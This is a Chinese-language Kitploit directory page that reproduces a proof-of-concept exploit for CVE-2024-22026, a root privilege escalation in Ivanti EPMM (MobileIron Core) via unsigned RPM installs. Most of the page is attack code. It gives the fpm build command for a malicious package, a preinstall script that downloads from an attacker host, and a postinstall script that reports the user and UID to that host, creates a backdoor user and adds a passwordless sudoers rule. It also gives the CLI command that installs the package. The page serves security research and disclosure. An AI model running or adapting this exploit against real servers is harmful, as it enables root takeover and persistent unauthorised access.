Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/securekomodo/cve-2024-22026
权限提升Payload生成漏洞分析漏洞利用论文与研究学习与教育
GitHubsecurekomodo/cve-2024-22026

CVE-2024-22026

针对影响 Ivanti EPMM "MobileIron Core" 的 CVE-2024-22026 的 Exploit POC

查看仓库
15432年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-22026

影响 Ivanti EPMM "MobileIron Core" 的 CVE-2024-22026 漏洞利用 POC image

CVE-2024-22026 是 Ivanti EPMM(原 MobileIron)服务器版本 12.1.0.0、12.0.0.0 和 11.12.0.1 之前的一个本地权限提升漏洞。该漏洞允许本地攻击者通过利用软件更新过程,从远程 URL 安装恶意 RPM 包,从而获得系统的 root 访问权限。

阅读完整博文以获取详细技术信息:利用 CVE-2024-22026:获取 Ivanti EPMM(MobileIron Core)的 root 权限

漏洞详情

  • CVE 编号:CVE-2024-22026
  • 严重性:未确定
  • 攻击向量:本地
  • 影响:允许本地攻击者获取 root 访问权限
  • 受影响版本:Ivanti EPMM(原 MobileIron)服务器版本 12.1.0.0、12.0.0.0 和 11.12.0.1 之前
  • 补丁可用性:已在 12.1.0.0、12.0.0.0 和 11.12.0.1 版本中修补

发现

在我们的研究过程中,我们发现该设备以低权限用户身份使用以下命令获取并安装 RPM 包:

root@kitploit:~
install rpm url <remote url>

上述命令只是 CLI 包装器,实际执行的是以下以 root 身份运行的操作:

root@kitploit:~
/bin/rpm -Uvh *.rpm

底层 rpm 命令不执行任何签名验证或 URL 过滤,这意味着可以安装任意 RPM 包。这使得攻击者能够伪造并投递可危害设备的恶意 RPM 包。

漏洞利用 POC

创建恶意 RPM

以下命令用于创建恶意 RPM 包:

root@kitploit:~
fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .

预安装脚本(preinstall.sh)

root@kitploit:~
#!/bin/sh
curl -O http://<attacker_IP>/poc
exit 0

后安装脚本(postinstall.sh)

root@kitploit:~
#!/bin/sh
set -e  # Enable strict error checking

# Report back current user and privilege level
CURRENT_USER=$(whoami | base64)
PRIV_LEVEL=$(id -u | base64)

curl http://<attacker_IP>/poc?user=$CURRENT_USER
curl http://<attacker_IP>/poc?priv=$PRIV_LEVEL

# Create a new root user
if ! useradd -s /bin/sh -m exploit-poc; then
  echo "Failed to add user 'exploit-poc'" >&2
  exit 1
fi

echo "exploit-poc:<redacted_password>" | chpasswd

# Grant root privileges
if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then
  echo "Failed to modify sudoers file" >&2
  exit 1
fi

exit 0

运行 CLI 命令以获取 RPM

要利用该漏洞,攻击者需在 CLI 中运行以下命令来获取并安装恶意 RPM:

root@kitploit:~
install rpm url http://<attacker_IP>/ivanti-privesc-13.37-1.i386.rpm

缓解措施

Ivanti 已发布补丁以解决 CVE-2024-22026,修复版本如下:

  • 12.1.0.0
  • 12.0.0.0
  • 11.12.0.1

免责声明

本仓库及其内容仅供教育和研究目的使用。使用此处包含的信息风险自负。

下载工具